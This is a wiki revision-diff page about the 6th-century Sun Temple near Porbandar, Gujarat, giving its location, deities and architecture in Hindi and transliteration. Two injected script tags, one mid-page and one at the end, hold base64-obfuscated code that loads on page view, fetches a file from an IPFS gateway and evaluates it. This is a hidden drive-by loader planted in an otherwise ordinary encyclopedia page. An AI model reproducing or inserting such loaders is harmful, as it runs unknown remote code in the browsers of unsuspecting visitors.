Difference between revisions of "सूर्य मंदिर पोरबंदर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "किमी." to "किलोमीटर")
 
(2 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*सूर्य मंदिर [[गुजरात]] राज्य के [[पोरबंदर]] शहर में स्थित है।  
+
{{बहुविकल्प|बहुविकल्पी शब्द=सूर्य|लेख का नाम=सूर्य मंदिर (बहुविकल्पी)}}
 +
'''सूर्य मंदिर''' [[गुजरात]] राज्य के [[पोरबंदर]] से 50 किलोमीटर उत्तर-पूर्व में स्थित है।
 
*सूर्य मंदिर का निर्माण 6ठीं शताब्दी में हुआ था।
 
*सूर्य मंदिर का निर्माण 6ठीं शताब्दी में हुआ था।
*सूर्य मंदिर पोरबंदर से 50 किलोमीटर उत्तर-पूर्व में स्थित है।
 
 
*सूर्य मंदिर पश्चिम [[भारत]] के आरंभिक मंदिरों में से एक जो आज भी विद्यमान हैं।
 
*सूर्य मंदिर पश्चिम [[भारत]] के आरंभिक मंदिरों में से एक जो आज भी विद्यमान हैं।
*सूर्य मंदिर में दो भुजा वाले भगवान गणेश और देवी पार्वती विराजमान हैं।
+
*सूर्य मंदिर में दो भुजा वाले [[गणेश|भगवान गणेश]] और [[पार्वती देवी|देवी पार्वती]] विराजमान हैं।
 
*सूर्य मंदिर की सबसे निचली छत पर कई उभरी हुई आकृतियां बनी हुई हैं।
 
*सूर्य मंदिर की सबसे निचली छत पर कई उभरी हुई आकृतियां बनी हुई हैं।
 
*सूर्य मंदिर की छत पिरामिड के आकार की है।
 
*सूर्य मंदिर की छत पिरामिड के आकार की है।
*सूर्य मंदिरर का वास्तुशिल्प बहुत ही अद्भुत है और मंदिर की सजाया बेहद दुर्लभ है।  
+
*सूर्य मंदिर का वास्तुशिल्प बहुत ही अद्भुत है और मंदिर की सजाया बेहद दुर्लभ है।  
  
 
==संबंधित लेख==
 
==संबंधित लेख==

Latest revision as of 07:09, 8 August 2013

chitr:Disamb2.jpg soory ek bahuvikalpi shabd hai any arthoan ke lie dekhean:- soory mandir (bahuvikalpi)

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

soory mandir gujarat rajy ke porabandar se 50 kilomitar uttar-poorv mean sthit hai.

  • soory mandir ka nirman 6thian shatabdi mean hua tha.
  • soory mandir pashchim bharat ke aranbhik mandiroan mean se ek jo aj bhi vidyaman haian.
  • soory mandir mean do bhuja vale bhagavan ganesh aur devi parvati virajaman haian.
  • soory mandir ki sabase nichali chhat par kee ubhari huee akritiyaan bani huee haian.
  • soory mandir ki chhat piramid ke akar ki hai.
  • soory mandir ka vastushilp bahut hi adbhut hai aur mandir ki sajaya behad durlabh hai.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>